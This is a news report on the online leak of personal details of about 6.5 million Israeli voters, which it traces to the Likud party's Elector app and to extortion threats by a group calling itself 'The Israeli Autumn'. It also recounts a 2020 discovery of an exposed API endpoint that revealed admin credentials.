Personal Details of 6.5 Million Israeli Voters Leaked Online

 

A database with the names and ID numbers of all the eligible voters in Israel was leaked online by anonymous hackers on Monday, a year after an identical breach and a day before the country’s fourth election in less than two years.

The source of the data seems to be the app elector designed by the software firm Elector Software for the Israeli political party Likud. The threats some of which were sent directly to the firm, included warnings that the threat actors would leak data that was allegedly stolen from the app, as well as private information on the firm’s CEO Tzur Yemin, and his family unless the app ceases operating. 

Last week, threat actors threatened to expose Israel’s full voter registry. The hackers initially shared links to download the data they claim to have stolen. The files were encrypted, while the threat actors were threatening to distribute the password unless the use of the Elector app was discontinued. 

Earlier this week, the hackers revealed the password via websites that don’t require registration allowing anyone to access them. The attackers identified as ‘The Israeli Autumn’, declared they were forced to release the information due to the failure of authorities to deal with Elector. 

Leaked data included the voter registration details of 6,528,565 Israelis and the private details of 3,179,313 of Israeli’s estimated 9.3 million total population (full names, phone numbers, ID card numbers, home addresses, gender, age, and political preferences). 

In February 2020, an Israeli web developer named Ran Bar-Zik, discovered that the app’s web had left exposed. An API endpoint that permitted him to get a list of the site’s admins and their account details, including passwords. Using those passwords, Bar-Zik said he was able to access a database containing the personal details of Israel voters.